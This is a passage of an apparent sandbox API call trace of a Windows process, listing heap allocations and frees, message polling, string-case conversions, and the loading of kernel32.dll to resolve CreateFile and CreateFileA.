hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0040.503] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0040.503] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.504] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0040.504] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.504] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0040.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0040.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.529] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0040.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0040.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca48 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0040.529] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0040.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0040.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0040.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0040.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.532] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.534] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0040.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c8c8 [0040.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c8c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0040.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.535] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0040.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | 